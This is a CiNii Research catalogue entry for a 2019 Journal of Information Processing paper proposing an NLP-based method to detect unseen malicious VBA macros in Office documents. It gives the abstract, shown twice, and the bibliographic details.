- 【Updated on May 12, 2025】 Integration of CiNii Dissertations and CiNii Books into CiNii Research
- Trial version of CiNii Research Automatic Translation feature is available on CiNii Labs
- Suspension and deletion of data provided by Nikkei BP
- Regarding the recording of “Research Data” and “Evidence Data”
Detecting Unseen Malicious VBA Macros with NLP Techniques
Search this article
Description
In recent years, the number of targeted email attacks which use Microsoft (MS) document files has been increasing. In particular, malicious VBA (Visual Basic for Applications) macros are often contained in the MS document files. Some researchers proposed methods to detect malicious MS document files. However, there are a few methods to analyze malicious macros themselves. This paper proposes a method to detect unseen malicious macros with the words extracted from the source code. Malicious macros tend to contain typical functions to download or execute the main body, and obfuscated strings such as encoded or divided characters. Our method represents feature vectors from the corpus with several NLP (Natural Language Processing) techniques. Our method then trains the extracted feature vectors and labels with basic classifiers, and the trained classifiers predict the labels from unseen macros. Experimental results show that our method can detect 89% of new malware families. The best F-measure achieves 0.93. ------------------------------ This is a preprint of an article intended for publication Journal of Information Processing(JIP). This preprint should not be cited. This article should be cited as: Journal of Information Processing Vol.27(2019) (online) DOI http://dx.doi.org/10.2197/ipsjjip.27.555 ------------------------------
In recent years, the number of targeted email attacks which use Microsoft (MS) document files has been increasing. In particular, malicious VBA (Visual Basic for Applications) macros are often contained in the MS document files. Some researchers proposed methods to detect malicious MS document files. However, there are a few methods to analyze malicious macros themselves. This paper proposes a method to detect unseen malicious macros with the words extracted from the source code. Malicious macros tend to contain typical functions to download or execute the main body, and obfuscated strings such as encoded or divided characters. Our method represents feature vectors from the corpus with several NLP (Natural Language Processing) techniques. Our method then trains the extracted feature vectors and labels with basic classifiers, and the trained classifiers predict the labels from unseen macros. Experimental results show that our method can detect 89% of new malware families. The best F-measure achieves 0.93. ------------------------------ This is a preprint of an article intended for publication Journal of Information Processing(JIP). This preprint should not be cited. This article should be cited as: Journal of Information Processing Vol.27(2019) (online) DOI http://dx.doi.org/10.2197/ipsjjip.27.555 ------------------------------
Journal
-
- 情報処理学会論文誌
-
情報処理学会論文誌 60 (9), 2019-09-15
- Tweet
Details 詳細情報について
-
- CRID
- 1050564288434035072
-
- NII Article ID
- 170000180441
-
- NII Book ID
- AN00116647
-
- ISSN
- 18827764
-
- Text Lang
- en
-
- Article Type
- journal article
-
- Data Source
-
- IRDB
- CiNii Articles